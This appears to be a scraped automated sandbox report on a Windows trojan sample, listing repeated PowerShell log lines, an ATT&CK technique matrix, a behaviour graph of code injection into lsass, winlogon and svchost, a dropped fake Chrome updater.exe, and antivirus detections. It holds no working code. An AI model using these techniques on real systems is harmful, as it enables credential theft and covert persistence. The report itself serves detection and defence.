                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,5_2_00007FF67E6C1C64
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A697A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_000002EA8A697A40
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Access Token Manipulation
                4
                Rootkit
                1
                Credential API Hooking
                1
                System Time Discovery
                Remote Services1
                Credential API Hooking
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                11
                DLL Side-Loading
                1
                Windows Service
                1
                Masquerading
                LSASS Memory221
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                Junk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)813
                Process Injection
                1
                Disable or Modify Tools
                Security Account Manager2
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Abuse Elevation Control Mechanism
                21
                Virtualization/Sandbox Evasion
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                DLL Side-Loading
                1
                Access Token Manipulation
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts813
                Process Injection
                Cached Domain Credentials1
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Hidden Files and Directories
                DCSync22
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Abuse Elevation Control Mechanism
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Obfuscated Files or Information
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Software Packing
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                DLL Side-Loading
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528505 Sample: h2qWqtD73F.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 62 Malicious sample detected (through community Yara rule) 2->62 64 Antivirus detection for dropped file 2->64 66 Antivirus / Scanner detection for submitted sample 2->66 68 14 other signatures 2->68 10 h2qWqtD73F.exe 4 2->10         started        14 powershell.exe 37 2->14         started        16 powershell.exe 23 2->16         started        18 2 other processes 2->18 process3 file4 56 C:\Users\user\AppData\Roaming\...\updater.exe, PE32+ 10->56 dropped 58 C:\Users\user\AppData\...\piukhnngkvtj.tmp, PE32+ 10->58 dropped 86 Suspicious powershell command line found 10->86 88 Writes to foreign memory regions 10->88 90 Modifies the context of a thread in another process (thread injection) 10->90 94 4 other signatures 10->94 20 dialer.exe 1 10->20         started        92 Loading BitLocker PowerShell Module 14->92 23 conhost.exe 14->23         started        25 conhost.exe 16->25         started        27 conhost.exe 18->27         started        29 conhost.exe 18->29         started        signatures5 process6 signatures7 70 Contains functionality to inject code into remote processes 20->70 72 Writes to foreign memory regions 20->72 74 Allocates memory in foreign processes 20->74 76 3 other signatures 20->76 31 svchost.exe 20->31 injected 33 lsass.exe 6 20->33 injected 36 winlogon.exe 20->36 injected 38 10 other processes 20->38 process8 signatures9 40 updater.exe 5 31->40         started        60 Writes to foreign memory regions 33->60 43 svchost.exe 33->43 injected process10 signatures11 78 Antivirus detection for dropped file 40->78 80 Multi AV Scanner detection for dropped file 40->80 82 Detected unpacking (creates a PE file in dynamic memory) 40->82 84 11 other signatures 40->84 45 dialer.exe 40->45         started        process12 signatures13 96 Injects code into the Windows Explorer (explorer.exe) 45->96 98 Writes to foreign memory regions 45->98 100 Allocates memory in foreign processes 45->100 102 2 other signatures 45->102 48 svchost.exe 45->48 injected 50 svchost.exe 45->50 injected 52 svchost.exe 45->52 injected 54 15 other processes 45->54 process14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                h2qWqtD73F.exe55%ReversingLabsWin64.Trojan.Whisperer
                h2qWqtD73F.exe100%AviraHEUR/AGEN.1329646
                h2qWqtD73F.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmp100%AviraHEUR/AGEN.1362356
                C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1329646
                C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe55%ReversingLabsWin64.Trojan.Whisperer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                199.232.214.172
                truefalse
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1403630784.0000022851A20000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
